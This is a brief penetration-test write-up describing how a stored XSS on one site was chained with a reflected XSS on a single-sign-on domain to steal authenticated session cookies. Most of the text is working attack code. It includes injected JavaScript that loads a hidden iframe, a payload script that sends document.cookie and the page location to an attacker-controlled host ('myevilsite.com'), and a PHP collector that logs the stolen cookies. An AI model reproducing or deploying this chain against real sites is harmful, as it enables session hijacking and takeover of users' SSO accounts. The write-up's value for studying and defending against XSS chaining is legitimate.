During a pentest to a big company using SSO (single-sign-on) system I found a stored xss
in one of their site, call it "a.com". This site unfortunately doesn't partecipate in the SSO login system,
so I had to devise a way to use it to steal the cookies from one of the SSO domains.
After some tests I found that "b.com" (one of the SSO domains) was vulnerable to reflected xss, so by injecting an iframe
in a.com that as a source was calling the vulnerable "b.com" url that in turn was loading an image that as a source was calling
my server I managed to steal sso authenticated cookies.
Let's see some code:
(the code is taking advantage of jquery.js since it was originally loaded by a.com)
The following code is an external js injected in the stored xss vulnerable parameter in "a.com"
$(document).ready(function() {
var el = document.createElement("iframe");
el.setAttribute('id', 'ifrm');
el.setAttribute('heigth', '0');
el.setAttribute('width', '0');
el.style.visibility="hidden";
document.body.appendChild(el);
url="http://www.b.com/index.php?query=%22%3CSCRIPT/SRC=http://myevilsite.com/Cookie_Stealer/ex.js?";
el.setAttribute('src', url);
});
where ex.js is:
var Image = document.createElement("img");
Image.setAttribute("width","30");
Image.src="http://myevilsite.com/Cookie_Stealer/stealer.php?c="+encodeURI(document.cookie)+"&location="+document.location;
and stealer.php code is:
<?php
$cookie = $_GET["c"];
echo $cookie;
$file = fopen("cookielog.txt", "a")
or die("Cannot open it");
fwrite($file, $cookie . "\n\n");
?>
Finally by visiting a.com while being logged to any of the SSO domains causes your credentials being sent to my server